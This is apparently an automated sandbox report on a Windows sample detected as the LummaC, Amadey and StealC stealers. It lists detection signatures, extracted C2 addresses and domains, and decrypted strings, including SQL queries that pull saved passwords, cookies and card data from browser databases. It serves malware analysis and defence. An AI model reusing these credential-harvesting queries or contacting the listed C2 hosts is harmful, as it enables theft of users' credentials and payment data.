Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546479
MD5: 04e39d3bf9bd2b3cdf9809124fc8e25c
SHA1: 923ce593cff9db08cf2990b7513a17875d0dd903
SHA256: f370ae6a49126a86d98f7f1d3ce1882f660e63873b8152f65feb69367ca843a2
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000020.00000002.2947624968.00000000004D1000.00000040.00000001.01000000.00000019.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 48.2.num.exe.2a0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: efe6fe4127.exe.5280.12.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "navygenerayk.store", "fadehairucw.store", "presticitpo.store", "thumbystriw.store", "necklacedmny.store", "scriptyprefej.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe ReversingLabs: Detection: 95%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9XHYSBI0DT1C8ABJDSO.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 30
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 11
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 20
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 24
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetProcAddress
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: LoadLibraryA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: lstrcatA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: OpenEventA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateEventA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CloseHandle
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Sleep
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VirtualFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetSystemInfo
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VirtualAlloc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HeapAlloc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetComputerNameA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: lstrcpyA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetProcessHeap
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetCurrentProcess
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: lstrlenA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ExitProcess
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetSystemTime
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: advapi32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: gdi32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: user32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: crypt32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ntdll.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetUserNameA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateDCA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetDeviceCaps
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ReleaseDC
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sscanf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VMwareVMware
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HAL9TH
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: JohnDoe
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DISPLAY
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: http://185.215.113.206
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: bksvnsj
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: /6c4adf523b719729.php
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: /746f34465cf17784/
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: tale
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetFileAttributesA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalLock
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HeapFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetFileSize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalSize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: IsWow64Process
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Process32Next
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetLocalTime
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FreeLibrary
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetVolumeInformationA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Process32First
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetLocaleInfoA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetModuleFileNameA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DeleteFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FindNextFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: LocalFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FindClose
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: LocalAlloc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetFileSizeEx
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ReadFile
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SetFilePointer
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: WriteFile
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FindFirstFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CopyFileA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: VirtualProtect
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetLastError
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: lstrcpynA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: MultiByteToWideChar
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: WideCharToMultiByte
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GlobalAlloc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: OpenProcess
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: TerminateProcess
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetCurrentProcessId
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: gdiplus.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ole32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: bcrypt.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: wininet.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: shlwapi.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: shell32.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: psapi.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: rstrtmgr.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SelectObject
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BitBlt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DeleteObject
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateCompatibleDC
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipGetImageEncoders
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdiplusStartup
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdiplusShutdown
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipSaveImageToStream
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipDisposeImage
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GdipFree
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetHGlobalFromStream
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CoUninitialize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CoInitialize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CoCreateInstance
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptDecrypt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptSetProperty
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptDestroyKey
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetWindowRect
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetDesktopWindow
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetDC
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CloseWindow
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: wsprintfA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CharToOemW
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: wsprintfW
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegQueryValueExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegEnumKeyExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegOpenKeyExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegCloseKey
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RegEnumValueA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CryptBinaryToStringA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CryptUnprotectData
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SHGetFolderPathA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ShellExecuteExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetOpenUrlA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetConnectA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetCloseHandle
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetOpenA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HttpSendRequestA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HttpOpenRequestA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetReadFile
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: InternetCrackUrlA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: StrCmpCA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: StrStrA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: StrCmpCW
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PathMatchSpecA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: GetModuleFileNameExA
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RmStartSession
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RmRegisterResources
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RmGetList
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: RmEndSession
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_open
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_step
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_column_text
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_finalize
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_close
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_column_bytes
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3_column_blob
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: encrypted_key
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PATH
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: NSS_Init
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: NSS_Shutdown
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PK11_FreeSlot
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PK11_Authenticate
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: C:\ProgramData\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: browser:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: profile:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: url:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: login:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: password:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Opera
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: OperaGX
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Network
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: cookies
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: .txt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: TRUE
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: FALSE
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: autofill
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: history
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: cc
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: name:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: month:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: year:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: card:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Cookies
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Login Data
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Web Data
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: History
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: logins.json
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: formSubmitURL
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: usernameField
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: encryptedUsername
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: encryptedPassword
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: guid
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: cookies.sqlite
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: formhistory.sqlite
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: places.sqlite
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: plugins
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Local Extension Settings
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Sync Extension Settings
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: IndexedDB
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Opera Stable
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Opera GX Stable
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: CURRENT
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: chrome-extension_
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Local State
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: profiles.ini
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: chrome
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: opera
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: firefox
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: wallets
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %08lX%04lX%lu
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ProductName
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: x32
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: x64
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ProcessorNameString
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DisplayName
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DisplayVersion
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Network Info:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - IP: IP?
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Country: ISO?
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: System Summary:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - HWID:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - OS:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Architecture:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - UserName:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Computer Name:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Local Time:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - UTC:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Language:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Keyboards:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Laptop:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Running Path:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - CPU:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Threads:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Cores:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - RAM:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - Display Resolution:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: - GPU:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: User Agents:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Installed Apps:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: All Users:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Current User:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Process List:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: system_info.txt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: freebl3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: mozglue.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: msvcp140.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: nss3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: softokn3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: vcruntime140.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Temp\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: .exe
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: runas
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: open
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: /c start
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %DESKTOP%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %APPDATA%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %USERPROFILE%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %DOCUMENTS%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %PROGRAMFILES%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: %RECENT%
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: *.lnk
